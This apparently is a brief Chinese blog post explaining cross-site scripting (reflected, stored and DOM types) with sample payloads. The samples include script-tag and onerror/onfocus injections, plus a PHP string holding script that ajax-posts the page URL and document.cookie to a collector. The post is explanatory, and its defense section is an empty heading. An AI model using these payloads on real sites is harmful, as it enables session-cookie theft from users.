XSS攻击

2018-02-25  本文已影响0人  silly鸿

XSS(跨站脚本攻击)原理

XSS攻击分类

反射型XSS
存储型XSS
DOMXSS

XSS根源就是没完全过滤客户端提交的数据

反射型XSS

反射性XSS,又称为非持久性XSS。这种攻击方式的注入代码是从目服务器通过错误信息、搜索结果等等方式“反射”回来的。攻击方式具有一次性。攻击者通过电子电子邮件,图片,链接等方式将包含注入脚本的恶意链接发送给给受害者,当受害着点击链接时,注入脚本被输到目标服务器上,然后服务器将注入的脚本“反射”到受害者的浏览器上,从而在该浏览器上执行这段脚本


http://www.targetserver.com/search.php?input=<script>alert(document.cookie);</script>

存储型XSS

XSS的小技巧

      $username = "<script>
          $.ajax({
              url: 'xss.php',
              dataType: 'jsonp',
              data: {
                'site': document.location.href,
                'cookie': document.cookie}
          });
      </script>";
   $username_info = "\u003cscript\u003ealert(document.cookie);";
   $imgsrc="\" onerror=\"javascript:alert(document.cookie);\"";
$username2="\u003cimg src=\'\' onerror=javascript:alert(\'okok\');\u003e";

http://www.targetserver.com/search.php?input=<script>alert(document.cookie);</script>
<input type="text" name="address1" value="" onfocus="alert(document.cookie)">
eval("alert(1)"); 
document.write("<script>alert(1)</script>")

XSS出现的场景

1.1 比如:攻击者在论坛中放一个看似安全的连接,骗取用户点击后,窃取cookie中的用户私密信息;
1.2攻击者在论坛中加一个恶意表单,当用户提交表单的时候哦,却把信息传送到攻击者的服务器中,数据保存到数据中。而不是用户原本以为的信任站点

XSS防范方法

参考连接

XSS跨站脚本攻击过程最简单演示
一次XSS攻击过程
Web攻防之XSS,CSRF,SQL注入

上一篇 下一篇

猜你喜欢

热点阅读